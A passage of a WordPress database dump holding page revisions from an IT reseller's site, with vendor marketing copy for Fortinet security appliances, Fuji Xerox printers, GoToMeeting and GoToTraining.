Detection</strong></h5>\r\n</li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware-based Acceleration</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li>\r\n<h5><strong>False Positive Mitigation Tools</strong></h5>\r\n</li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced Visual Analytics</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Application Delivery Controller</strong></h4>\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure Traffic Management</strong></h5>\r\n</li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Application Optimization</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Global Server Load Balancing</strong></h5>\r\n</li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Features</strong></h5>\r\n</li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>DDoS</strong></h4>\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n&nbsp;\r\n<h2>THREAT DETECTION &amp; PREVENTION</h2>\r\n<h4><strong>1. Sandbox</strong></h4>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n<h4><strong>2.Â FortiSIEM</h4></strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Asset Self-Discovery</strong></h5>\r\n</li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Integrations and Scalability</strong></h5>\r\n</li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated Workflow</strong></h5>\r\n</li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Platform</strong></h5>\r\n</li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong></h4>\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Augmented Intelligence (AI)</strong></h5>\r\n</li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Regulatory Compliance Support</strong></h5>\r\n</li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data Security</strong></h5>\r\n</li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Forensic-level Reporting</strong></h5>\r\n</li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Valuable Insights</strong></h5>\r\n</li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 14:25:44','2019-09-30 06:25:44','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3567,1,'2019-09-30 14:31:16','2019-09-30 06:31:16','<h2>Printers</h2>\r\nExceptional print quality, productivity and ease of use.\r\n\r\nFuji Xerox printers and all-in-one printers are ideal fit for both small &amp; medium business environments, whether you need vibrant color, black-and-white printing, or more robust features to handle sophisticated document workflows. All of our printers and desktop all-in-one printers offer built-in productivity and reliability you can count on.\r\n<h2>Multifunction Printers</h2>\r\nPrint, copy, scan and fax all in one device.\r\n\r\nFuji Xerox multifunction printers (MFPs) deliver flexibility with print, copy, scan and fax all from one device. Additional features like device embedded solutions and cloud-based solutions that help you handle various information efficiently, while also meeting your security requirements. Now you can have the freedom to work in the most efficient and productive way, saving time and resources.\r\n\r\nNo matter which multifunction printer you choose, youâ€™ll get easy-to-use interfaces, reliable paper handling, advanced security and sophisticated tools for adding required flexibility and efficiency in your regular jobs. Designed to handle your workgroupâ€™s high volumes, Fuji Xerox multifunction printers can automate repetitive tasks and customize workflows.\r\n<h2>Production Print</h2>\r\nDigital press models in full colour, monochrome or spot colour deliver benchmark print quality and productivity.\r\n\r\nFuji Xerox provides solutions in the graphic communications, in-plant and production print environments with high-volume printing requirements. These solutions enable on-demand printing of a wide range of applications, including publishing, transaction printing, direct mail, print-on-demand, short runs, packaging, photo publishing and marketing collateral. Our high-volume digital printing press models and production printers are available in full color or monochrome and combine vibrant quality with high speed and productivity. A coordinated approach of print and digital media is used to deliver messages and information efficiently and effectively, by utilizing on-demand printing and various printing technologies to timely communicate relevant information to target customers. As a global partner in developing compelling communication that captures attention and encourages response from customers, Fuji Xerox delivers personalized content to customers through collaborations with partner companies in the industry.\r\n<h2>Software</h2>\r\nYour multifunction printer may already print, copy, scan and fax. But when you add software solutions to the equation, you\'ll multiply your productivity and create aÂ transformational experience. Simplify and automate your everyday work, better manage your information, improve document security, enable easy scanning, and get the most out of your hardware investment as you continue your digital journey.\r\n<h2>Wide Format</h2>\r\nFulfil your large format A0 print and scan requirements with Fuji Xerox wide format multifunction printers. Constant growing needs of digitalization and connected devices in Engineering departments can be effectively managed with Fuji Xerox DocuWide series coming with in-build high speed, high-resolution color scanner and excellent quality print output.\r\n<h2>Scanners</h2>\r\nFuji Xerox scanners provide the digital on-ramp for businesses to transform their hard-copy documents into an efficient document management solution. Our wide range of scanners are able to cover needs starting from small businesses to professional users with very high speed scanning requirements. While hardware may just be the beginning of your scanning requirement, Fuji Xeroxâ€™s leading document management software accompanying these devices beautifully complements its hardware to simplify and automate your processes at no extra cost.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Fuji Xerox','','inherit','closed','closed','','1482-revision-v1','','','2019-09-30 14:31:16','2019-09-30 06:31:16','',1482,'https://bintara.com.my/blog/2019/09/30/1482-revision-v1/',0,'revision','',0),(3568,1,'2019-09-30 14:33:41','2019-09-30 06:33:41','<h2>Printers</h2>\r\n<strong>Exceptional print quality, productivity and ease of use.</strong>\r\n\r\nFuji Xerox printers and all-in-one printers are ideal fit for both small &amp; medium business environments, whether you need vibrant color, black-and-white printing, or more robust features to handle sophisticated document workflows. All of our printers and desktop all-in-one printers offer built-in productivity and reliability you can count on.\r\n\r\n&nbsp;\r\n<h2>Multifunction Printers</h2>\r\n<strong>Print, copy, scan and fax all in one device.</strong>\r\n\r\nFuji Xerox multifunction printers (MFPs) deliver flexibility with print, copy, scan and fax all from one device. Additional features like device embedded solutions and cloud-based solutions that help you handle various information efficiently, while also meeting your security requirements. Now you can have the freedom to work in the most efficient and productive way, saving time and resources.\r\n\r\nNo matter which multifunction printer you choose, youâ€™ll get easy-to-use interfaces, reliable paper handling, advanced security and sophisticated tools for adding required flexibility and efficiency in your regular jobs. Designed to handle your workgroupâ€™s high volumes, Fuji Xerox multifunction printers can automate repetitive tasks and customize workflows.\r\n\r\n&nbsp;\r\n<h2>Production Print</h2>\r\n<strong>Digital press models in full colour, monochrome or spot colour deliver benchmark print quality and productivity.</strong>\r\n\r\nFuji Xerox provides solutions in the graphic communications, in-plant and production print environments with high-volume printing requirements. These solutions enable on-demand printing of a wide range of applications, including publishing, transaction printing, direct mail, print-on-demand, short runs, packaging, photo publishing and marketing collateral. Our high-volume digital printing press models and production printers are available in full color or monochrome and combine vibrant quality with high speed and productivity. A coordinated approach of print and digital media is used to deliver messages and information efficiently and effectively, by utilizing on-demand printing and various printing technologies to timely communicate relevant information to target customers. As a global partner in developing compelling communication that captures attention and encourages response from customers, Fuji Xerox delivers personalized content to customers through collaborations with partner companies in the industry.\r\n\r\n&nbsp;\r\n<h2>Software</h2>\r\nYour multifunction printer may already print, copy, scan and fax. But when you add software solutions to the equation, you\'ll multiply your productivity and create aÂ transformational experience. Simplify and automate your everyday work, better manage your information, improve document security, enable easy scanning, and get the most out of your hardware investment as you continue your digital journey.\r\n\r\n&nbsp;\r\n<h2>Wide Format</h2>\r\nFulfil your large format A0 print and scan requirements with Fuji Xerox wide format multifunction printers. Constant growing needs of digitalization and connected devices in Engineering departments can be effectively managed with Fuji Xerox DocuWide series coming with in-build high speed, high-resolution color scanner and excellent quality print output.\r\n\r\n&nbsp;\r\n<h2>Scanners</h2>\r\nFuji Xerox scanners provide the digital on-ramp for businesses to transform their hard-copy documents into an efficient document management solution. Our wide range of scanners are able to cover needs starting from small businesses to professional users with very high speed scanning requirements. While hardware may just be the beginning of your scanning requirement, Fuji Xeroxâ€™s leading document management software accompanying these devices beautifully complements its hardware to simplify and automate your processes at no extra cost.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Fuji Xerox','','inherit','closed','closed','','1482-revision-v1','','','2019-09-30 14:33:41','2019-09-30 06:33:41','',1482,'https://bintara.com.my/blog/2019/09/30/1482-revision-v1/',0,'revision','',0),(3569,1,'2019-09-30 14:43:38','2019-09-30 06:43:38','<h2 class=\"section-header__headline\">Connect with anyone, anywhere. On any device.</h2>\r\n<h4 class=\"section-header__subheadline\">GoToMeeting makes it easy to connect with people any way you want.</h4>\r\n<ul>\r\n 	<li>\r\n<h4>Collaborate with business managing</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2014\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1.jpg\" alt=\"\" width=\"673\" height=\"356\" />\r\n<ul>\r\n 	<li>\r\n&nbsp;\r\n<h4>Less note-taking with Transcripts</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2015\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/2.png\" alt=\"\" width=\"667\" height=\"371\" />\r\n<ul>\r\n 	<li>\r\n<h4>Meet instantly or schedule one for later</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2016\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3.jpg\" alt=\"\" width=\"665\" height=\"351\" />\r\n<ul>\r\n 	<li>\r\n<h4>Customize team setting to your needs</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2017\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/4.jpg\" alt=\"\" width=\"652\" height=\"348\" />\r\n<ul>\r\n 	<li>\r\n<h4>Out of the box video conferencing</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2018\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/5.jpg\" alt=\"\" width=\"661\" height=\"327\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','GoToMeeting','','inherit','closed','closed','','1632-revision-v1','','','2019-09-30 14:43:38','2019-09-30 06:43:38','',1632,'https://bintara.com.my/blog/2019/09/30/1632-revision-v1/',0,'revision','',0),(3570,1,'2019-09-30 14:44:06','2019-09-30 06:44:06','<h2 class=\"section-header__headline\">Connect with anyone, anywhere. On any device.</h2>\r\n<h4 class=\"section-header__subheadline\">GoToMeeting makes it easy to connect with people any way you want.</h4>\r\n<ul>\r\n 	<li>\r\n<h4>Collaborate with business managing</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2014\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1.jpg\" alt=\"\" width=\"673\" height=\"356\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h4>Less note-taking with Transcripts</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2015\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/2.png\" alt=\"\" width=\"667\" height=\"371\" />\r\n<ul>\r\n 	<li>\r\n<h4>Meet instantly or schedule one for later</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2016\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3.jpg\" alt=\"\" width=\"665\" height=\"351\" />\r\n<ul>\r\n 	<li>\r\n<h4>Customize team setting to your needs</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2017\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/4.jpg\" alt=\"\" width=\"652\" height=\"348\" />\r\n<ul>\r\n 	<li>\r\n<h4>Out of the box video conferencing</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2018\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/5.jpg\" alt=\"\" width=\"661\" height=\"327\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','GoToMeeting','','inherit','closed','closed','','1632-revision-v1','','','2019-09-30 14:44:06','2019-09-30 06:44:06','',1632,'https://bintara.com.my/blog/2019/09/30/1632-revision-v1/',0,'revision','',0),(3571,1,'2019-09-30 14:45:33','2019-09-30 06:45:33','<h2 class=\"section-header__headline\">Connect with anyone, anywhere. On any device.</h2>\r\n<h4 class=\"section-header__subheadline\">GoToMeeting makes it easy to connect with people any way you want.</h4>\r\n<ul>\r\n 	<li>\r\n<h4>Collaborate with business managing</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2014\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1.jpg\" alt=\"\" width=\"673\" height=\"356\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h4>Less note-taking with Transcripts</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2015\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/2.png\" alt=\"\" width=\"667\" height=\"371\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h4>Meet instantly or schedule one for later</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2016\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3.jpg\" alt=\"\" width=\"665\" height=\"351\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h4>Customize team setting to your needs</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2017\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/4.jpg\" alt=\"\" width=\"652\" height=\"348\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h4>Out of the box video conferencing</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2018\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/5.jpg\" alt=\"\" width=\"661\" height=\"327\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','GoToMeeting','','inherit','closed','closed','','1632-revision-v1','','','2019-09-30 14:45:33','2019-09-30 06:45:33','',1632,'https://bintara.com.my/blog/2019/09/30/1632-revision-v1/',0,'revision','',0),(3572,1,'2019-09-30 15:29:10','2019-09-30 07:29:10','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n<div></div>\r\n<div>\r\n<h2></h2>\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<div></div>\r\n<div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<div></div>\r\n</div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n<div>\r\n<h2></h2>\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">\r\n\r\nSend emails after your class and reward your attendees when they finish.\r\n<ul>\r\n 	<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<div></div>\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 15:29:10','2019-09-30 07:29:10','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3575,1,'2019-09-30 15:50:39','2019-09-30 07:50:39','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n\r\n\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n\r\n<ul>\r\n<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">\r\n\r\nSend emails after your class and reward your attendees when they finish.\r\n<ul>\r\n<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<div>\r\n  <iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n</div>\r\n&nbsp;','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 15:50:39','2019-09-30 07:50:39','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3576,1,'2019-09-30 15:51:42','2019-09-30 07:51:42','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">\r\n\r\nSend emails after your class and reward your attendees when they finish.\r\n<ul>\r\n 	<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" 